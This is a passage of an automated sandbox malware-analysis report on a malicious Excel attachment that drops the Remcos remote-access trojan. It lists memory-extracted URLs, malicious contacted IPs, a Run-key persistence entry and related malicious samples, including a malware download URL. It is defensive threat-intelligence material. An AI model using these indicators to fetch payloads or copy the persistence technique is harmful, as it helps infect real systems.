                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://servername/isapibackend.dllpowershell.exe, 00000007.00000002.2128403252.000000001D3B0000.00000002.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.valicert.1powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.ssc.lt/cps03powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.windows.com/pctv.powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpfalse
                      		high
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=powershell.exe, 00000007.00000002.2128313611.000000001D06F000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://ocsp.pki.gva.es0powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://crl.oces.certifikat.dk/oces.crl0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://crl.ssc.lt/root-b/cacrl.crl0powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.certicamara.com/dpc/0Zpowershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                        		high
                        http://crl.pki.wellsfargo.com/wsprca.crl0powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpfalse
                          		high
                          http://www.dnie.es/dpc0powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.rootca.or.kr/rca/cps.html0powershell.exe, 00000007.00000002.2126547382.000000001B92B000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.trustcenter.de/guidelines0powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://windowsmedia.com/redir/services.asp?WMPFriendly=truepowershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.globaltrust.info0powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://certificates.starfieldtech.com/repository/1604powershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                            		high
                            http://www.certplus.com/CRL/class3TS.crl0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.entrust.net/CRL/Client1.crl0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                              		high
                              http://www.entrust.net/CRL/net1.crl0powershell.exe, 00000007.00000003.2116822019.000000001D033000.00000004.00000001.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000007.00000002.2120085059.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2156941353.00000000023B0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2176488120.0000000002350000.00000002.00000001.sdmpfalse
                                  		high
                                  https://www.catcert.net/verarrelpowershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.disig.sk/ca0fpowershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000009.00000002.2156295854.000000000029E000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2175630207.00000000001AE000.00000004.00000020.sdmpfalse
                                    		high
                                    http://www.e-szigno.hu/RootCA.crlpowershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpfalse
                                      		high
                                      http://www.signatur.rtr.at/current.crl0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                        		high
                                        http://www.sk.ee/juur/crl/0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.chambersign.org/chambersignroot.crl0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.xrampsecurity.com/XGCA.crl0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.quovadis.bm0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.ssc.lt/root-a/cacrl.crl0powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.trustdst.com/certificates/policy/ACES-index.html0powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.firmaprofesional.com0powershell.exe, 00000007.00000002.2119346499.00000000003BE000.00000004.00000020.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://cutt.ly/powershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmptrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://www.netlock.net/docspowershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crlpowershell.exe, 00000007.00000003.2116860749.000000001CFF1000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpfalse
                                          		high
                                          http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpfalse
                                            		high
                                            http://cps.chambersign.org/cps/publicnotaryroot.html0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.e-trust.be/CPS/QNcertspowershell.exe, 00000007.00000003.2116846674.000000001CFFF000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.certicamara.com/certicamaraca.crl0powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpfalse
                                              		high
                                              http://www.msnbc.com/news/ticker.txtpowershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpfalse
                                                		high
                                                http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://fedir.comsign.co.il/crl/ComSignCA.crl0powershell.exe, 00000007.00000002.2126514479.000000001B925000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0powershell.exe, 00000007.00000002.2128269583.000000001D020000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://ocsp.entrust.net03powershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://cps.chambersign.org/cps/chambersroot.html0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.acabogacia.org0powershell.exe, 00000007.00000003.2116875017.000000001CFF8000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.valicert.powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cutt.lypowershell.exe, 00000007.00000002.2123090513.00000000035BE000.00000004.00000001.sdmptrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ca.sia.it/seccli/repository/CPS0powershell.exe, 00000007.00000002.2126041988.000000001B830000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://crl.securetrust.com/SGCA.crl0powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://crl.securetrust.com/STCA.crl0powershell.exe, 00000007.00000003.2116803400.000000001D00E000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0powershell.exe, 00000007.00000003.2116793159.000000001B91B000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.icra.org/vocabulary/.powershell.exe, 00000007.00000002.2128046184.000000001CDE7000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.certicamara.com/certicamaraca.crl0;powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://www.e-szigno.hu/RootCA.crt0powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://www.quovadisglobal.com/cps0powershell.exe, 00000007.00000003.2116887830.000000001B92E000.00000004.00000001.sdmpfalse
                                                      		high
                                                      http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0Lpowershell.exe, 00000007.00000002.2119396182.000000000041C000.00000004.00000020.sdmpfalse
                                                        		high
                                                        http://investor.msn.com/powershell.exe, 00000007.00000002.2127799800.000000001CC00000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.valicert.com/1powershell.exe, 00000007.00000002.2126198847.000000001B874000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.e-szigno.hu/SZSZ/0powershell.exe, 00000007.00000002.2128219101.000000001CFE0000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.%s.comPApowershell.exe, 00000007.00000002.2120085059.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2156941353.00000000023B0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2176488120.0000000002350000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		low
                                                            http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://ocsp.quovadisoffshore.com0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.2126345778.000000001B8AF000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://cps.chambersign.org/cps/chambersignroot.html0powershell.exe, 00000007.00000003.2116774596.000000001D062000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://ca.sia.it/secsrv/repository/CRL.der0Jpowershell.exe, 00000007.00000002.2126431477.000000001B8FB000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            185.244.30.19
                                                            		unknownNetherlands
                                                            		209623DAVID_CRAIGGGtrue
                                                            83.172.144.37
                                                            		unknownNetherlands
                                                            		25459NEDZONE-ASNLtrue
                                                            104.22.1.232
                                                            		unknownUnited States
                                                            		13335CLOUDFLARENETUStrue

                                                            General Information

                                                            Joe Sandbox Version:31.0.0 Red Diamond
                                                            Analysis ID:336456
                                                            Start date:06.01.2021
                                                            Start time:07:45:14
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 12m 46s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:Shipping Document PLBL003534.xls
                                                            Cookbook file name:defaultwindowsofficecookbook.jbs
                                                            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                            Number of analysed new started processes analysed:35
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.expl.evad.winXLS@47/20@27/3
                                                            EGA Information:Failed
                                                            HDC Information:
                                                            • Successful, ratio: 45.5% (good quality ratio 28.9%)
                                                            • Quality average: 47.1%
                                                            • Quality standard deviation: 42.1%
                                                            HCA Information:
                                                            • Successful, ratio: 94%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .xls
                                                            • Changed system and user locale, location and keyboard layout to English - United States
                                                            • Found Word or Excel or PowerPoint or XPS Viewer
                                                            • Attach to Office via COM
                                                            • Scroll down
                                                            • Close Viewer
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                                                            • TCP Packets have been reduced to 100
                                                            • Excluded IPs from analysis (whitelisted): 2.20.142.210, 2.20.142.209, 67.27.233.254, 8.253.204.120, 67.27.157.126, 67.27.159.254, 67.27.159.126
                                                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, audownload.windowsupdate.nsatc.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, auto.au.download.windowsupdate.com.c.footprint.net, au-bg-shim.trafficmanager.net
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            07:45:52API Interceptor448x Sleep call for process: powershell.exe modified
                                                            07:46:20API Interceptor99x Sleep call for process: sm.exe modified
                                                            07:46:29API Interceptor3x Sleep call for process: schtasks.exe modified
                                                            07:46:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Remcos "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                            07:46:33API Interceptor20x Sleep call for process: wscript.exe modified
                                                            07:46:36API Interceptor1270x Sleep call for process: remcos.exe modified
                                                            07:46:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Remcos "C:\Users\user\AppData\Roaming\Remcos\remcos.exe"

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            185.244.30.19Orden CW62175Q, pdf.exeGet hashmaliciousBrowse
                                                              Orden CW62125Q, pdf.exeGet hashmaliciousBrowse
                                                                Orden CW62125Q, pdf.exeGet hashmaliciousBrowse
                                                                  20200330JU30181529080,pdf.exeGet hashmaliciousBrowse
                                                                    su boleta de citaci#U00f3n (N#U00ba 00946745 ).vbsGet hashmaliciousBrowse
                                                                      83.172.144.376Cprm97UTl.xlsGet hashmaliciousBrowse
                                                                      • bighoreca.nl/wp-content/themes/index/QPR-3067.exe
                                                                      104.22.1.232http://cutt.ly/Get hashmaliciousBrowse
                                                                      • cutt.ly/

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      bighoreca.nl6Cprm97UTl.xlsGet hashmaliciousBrowse
                                                                      • 83.172.144.37
                                                                      cutt.ly6Cprm97UTl.xlsGet hashmaliciousBrowse
                                                                      • 104.22.0.232
                                                                      spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                      • 104.22.0.232
                                                                      1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                      • 104.22.0.232
                                                                      spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      AdviceSlip.xlsGet hashmaliciousBrowse
                                                                      • 104.22.0.232
                                                                      file.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      file.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      file.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      output.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      SecuriteInfo.com.Heur.20246.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      SecuriteInfo.com.Exploit.Siggen3.5270.27062.xlsGet hashmaliciousBrowse
                                                                      • 104.22.0.232
                                                                      30689741.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      95773220855.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      95773220855.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      MT-000137.xlsGet hashmaliciousBrowse
                                                                      • 172.67.8.238
                                                                      95773220855.xlsGet hashmaliciousBrowse
                                                                      • 104.22.0.232

                                                                      ASN

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      CLOUDFLARENETUSQPI-01458.exeGet hashmaliciousBrowse
                                                                      • 172.67.188.154
                                                                      LITmNphcCA.exeGet hashmaliciousBrowse
                                                                      • 104.28.5.151
                                                                      http://fake-cash-app-screenshot-generator.hostforjusteasy.funGet hashmaliciousBrowse
                                                                      • 172.67.179.45
                                                                      http://download2224.mediafire.com/5rqvtr7atabg/4ufxk777x7qfcdd/FastStoneCapturePortableTW_9.0_azo.exeGet hashmaliciousBrowse
                                                                      • 104.16.203.237
                                                                      http://click.freshwaterlive.info/campaign/clicked/MjgzNjAxMzU%3D__MTAxOA%3D%3D__MjY3NzY5Ng%3D%3D__MjI2/aHR0cDovL2JpdC5seS8ySk1GMUJk?c=28360135Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      https://awattorneys-my.sharepoint.com/:b:/p/fgalante/EcRfEpzLM_tOh_Roewbwm9oB4JarWh_30QaPZLGUdNbnuw?e=4%3aqmwocp&at=9Get hashmaliciousBrowse
                                                                      • 104.16.18.94
                                                                      http://reppoflag.net/2307e0382f77c950a2.jsGet hashmaliciousBrowse
                                                                      • 172.64.170.19
                                                                      https://firebasestorage.googleapis.com/v0/b/blckaxe.appspot.com/o/general%20page.html?alt=media&token=b4029a1b-78f5-43ff-a7eb-d4555ad6a60e#kymo@willowoodusa.comGet hashmaliciousBrowse
                                                                      • 104.16.18.94
                                                                      http://hoquetradersltd.com/jordanbruce/index.phpGet hashmaliciousBrowse
                                                                      • 104.16.18.94
                                                                      https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                                      • 104.18.70.113
                                                                      https://preview.hs-sites.com/_hcms/preview/template/multi?domain=undefined&hs_preview_key=SlyW7XnGAffndKslJ_Oq0Q&portalId=8990448&tc_deviceCategory=undefined&template_file_path=mutli/RFQ.htmlGet hashmaliciousBrowse
                                                                      • 104.16.115.104
                                                                      HSBC Payment Advice - HSBC67628473234[20201412].exeGet hashmaliciousBrowse
                                                                      • 172.67.156.125
                                                                      http://search.hwatchtvnow.coGet hashmaliciousBrowse
                                                                      • 104.18.225.52
                                                                      https://web.tresorit.com/l/d2q5C#T3PZC5SR6Y1Akp1-8AT_JgGet hashmaliciousBrowse
                                                                      • 104.18.70.113
                                                                      http://p1.pagewiz.net/w5c8j120/Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      Og8qU1smzy.exeGet hashmaliciousBrowse
                                                                      • 162.159.138.232
                                                                      https://nimb.ws/10IXxlGet hashmaliciousBrowse
                                                                      • 104.26.3.186
                                                                      https://www.canva.com/design/DAESYWKuLHs/avvDNRvDuj_tk82H9Q45ZQ/view?utm_content=DAESYWKuLHs&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                      • 104.17.115.17
                                                                      Ema.exeGet hashmaliciousBrowse
                                                                      • 104.23.98.190
                                                                      http://p1.pagewiz.net/w5c8j120/Get hashmaliciousBrowse
                                                                      • 104.16.19.94
                                                                      NEDZONE-ASNL6Cprm97UTl.xlsGet hashmaliciousBrowse
                                                                      • 83.172.144.37
                                                                      https://balenpersen.com/TO/financialcrimes@lvmpd.comGet hashmaliciousBrowse
                                                                      • 83.172.131.9
                                                                      SecuriteInfo.com.Trojan.GenericKD.34438057.21356.docGet hashmaliciousBrowse
                                                                      • 83.172.180.164
                                                                      https://installatiebedrijfroosendaal.nl/ONWFP-gO_YnJ-5Yu/ACH/PaymentAdvice/En_us/Sales-InvoiceGet hashmaliciousBrowse
                                                                      • 83.172.144.29
                                                                      DAVID_CRAIGGGDHL1.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.221
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.227
                                                                      988119028872673623l.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.163
                                                                      SecuriteInfo.com.Fareit-FZO54A4BE7037EC.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.149
                                                                      QUOTATION2021_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.211
                                                                      NEWQUOTATION_RFQ#38787_A_Bich_Thien_Trading_Co_Ltd.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.211
                                                                      R3lJMVp0ep.exeGet hashmaliciousBrowse
                                                                      • 185.244.30.87
                                                                      Payment Copy.exeGet hashmaliciousBrowse
                                                                      • 185.244.30.92
                                                                      SOA_30_11_2020,pdf.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.135
                                                                      20201229_QUA_20Y0252,pdf.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.135
                                                                      DHL FI.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.221
                                                                      DHL DETAILS.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.221
                                                                      d2H8MOKNiq1xjLZ.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.221
                                                                      DHL file.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.221
                                                                      DQu38121jV.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.149
                                                                      PGHT2012023 (Invoice & Packing).exeGet hashmaliciousBrowse
                                                                      • 185.244.30.90
                                                                      PO029734,pdf.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.135
                                                                      Payment Copy.doc.......exeGet hashmaliciousBrowse
                                                                      • 185.165.153.116
                                                                      Bank Account Details.pdf.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.219
                                                                      VSI_202012223,pdf.exeGet hashmaliciousBrowse
                                                                      • 185.140.53.135

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      05af1f5ca1b87cc9cc9b25185115607dST_Heodo_ST_2021-01-05_19-42-11-017.eml_20210105Rechnung.doc_analyze.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      6Cprm97UTl.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      DAT 2020_12_30.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      N.11389944 BS 05 gen 2021.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      PSX7103491.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      Beauftragung.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      1I72L29IL3F.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      Adjunto_2021.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      #U00e0#U00a4#U00ac#U00e0#U00a5#U20ac#U00e0#U00a4#U0153#U00e0#U00a4#U2022.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      Dok 0501 012021 Q_93291.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      invoice.docGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      output.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      output.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      New Avinode Plans and Prices 2021.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      spetsifikatsiya.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      Shipping Details DHL.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232
                                                                      AdviceSlip.xlsGet hashmaliciousBrowse
                                                                      • 104.22.1.232

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                                      Category:dropped
                                                                      Size (bytes):58936
                                                                      Entropy (8bit):7.994797855729196
                                                                      Encrypted:true
